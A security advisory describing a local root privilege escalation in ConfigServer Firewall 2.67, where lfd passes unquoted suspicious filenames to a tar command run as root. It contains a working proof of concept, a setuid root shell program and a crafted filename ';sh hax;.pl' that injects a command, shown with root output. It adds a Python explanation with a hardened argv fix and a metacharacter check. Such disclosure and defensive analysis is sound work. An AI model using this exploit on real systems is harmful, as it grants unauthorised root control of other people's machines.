CSF 2.67 - local root privilege escalation via `/bin/tar` command



DESCRIPTION


If the "LF_DIRWATCH_DISABLE" option is enabled in ConfigServer Firewall 2.67, then any suspicious files found by lfd when the dirfiles() subroutine is called will be placed into a tarball at /etc/csf/suspicious.tar. This is done by executing a command similar to the following as root:

tar --remove-files -rf /etc/csf/suspicious_files.tar $filename


Any local user can craft a filename containing shell metacharacters in order to execute commands as root. LF_DIRWATCH_DISABLE is set to 0 by default. Suspicious filetypes looked for in the dirfiles() subroutine include those that end in .pl, .cgi, .py, and more.



IMPACT


Command execution as root, full system compromise.



[user@host ~]$ cat > root.c << EOF
int main() {
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
EOF
[user@host ~]$ gcc root.c -o root
[user@host ~]$ cd /tmp
[user@host /tmp]$ echo 'chown root.root /home/user/root ; chmod 4755 /home/user/root' > hax
[user@host /tmp]$ touch ';sh hax;.pl'

After about 1 minute...

[user@host ~]$ ls -l root
-rwsr-xr-x 1 root root 4950 Aug 24 07:57 root
[user@host ~]$ ./root
[root@host ~]# id
uid=0(root) gid=0(root) groups=500(user)


What's happening in the example above is that lfd is effectively running the following shell command as root from within the /tmp directory:

tar --remove-files -rf /etc/suspicious.tar ;sh hax


Since the semicolon is a shell metacharacter (a character that, when unquoted, separates words, a word being a sequence of characters the shell treats as a single unit), it terminates the tar command and starts a new one, "sh hax", which executes the commands in the file called "hax" from the current directory (/tmp).
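As an added illustration (not part of the advisory and not CSF's own code), the Python below tokenises the interpolated command the way a POSIX shell splits it, showing how the filename becomes a second command, and puts the hardened form beside it: an argv list run without a shell plus a "--" end-of-options marker, which in lfd's Perl would be the list form of system(). The tarball path and the filename are the ones quoted in the advisory; the function names and the metacharacter check are assumptions of this example.

```python
"""Unquoted-filename command injection (the CSF 2.67 lfd/tar pattern) and its fix.
Added example, not CSF code. TARBALL is the path quoted in the advisory."""
import shlex
from typing import List

TARBALL = "/etc/csf/suspicious_files.tar"


def vulnerable_command(filename: str) -> str:
    """The advisory's pattern: the filename is interpolated into one string that a
    shell will parse, so any unquoted metacharacter in it ends the tar command."""
    return f"tar --remove-files -rf {TARBALL} {filename}"


def shell_commands(cmd: str) -> List[List[str]]:
    """Tokenise cmd as a POSIX shell would and split it into simple commands at ';'
    (shlex with punctuation_chars=True emits ';' as a token of its own)."""
    lexer = shlex.shlex(cmd, posix=True, punctuation_chars=True)
    commands: List[List[str]] = []
    current: List[str] = []
    for tok in lexer:
        if tok == ";":
            if current:
                commands.append(current)
            current = []
        else:
            current.append(tok)
    if current:
        commands.append(current)
    return commands


def safe_argv(filename: str) -> List[str]:
    """Hardened form: an argv list run with subprocess.run(..., shell=False) so no
    shell ever sees the name and metacharacters stay inside one argument; '--'
    keeps a name starting with '-' from being parsed as a tar option."""
    return ["tar", "--remove-files", "-rf", TARBALL, "--", filename]


def is_suspicious_name(filename: str) -> bool:
    """Detection check (assumed, not from CSF): a leading '-' or any shell
    metacharacter in a flagged filename is itself worth alerting on."""
    return filename.startswith("-") or any(c in filename for c in ";|&$`<>()\n")


if __name__ == "__main__":
    name = ";sh hax;.pl"  # the filename from the advisory's demonstration
    for part in shell_commands(vulnerable_command(name)):
        print("shell would run:", part)
    print("safe argv:", safe_argv(name))
```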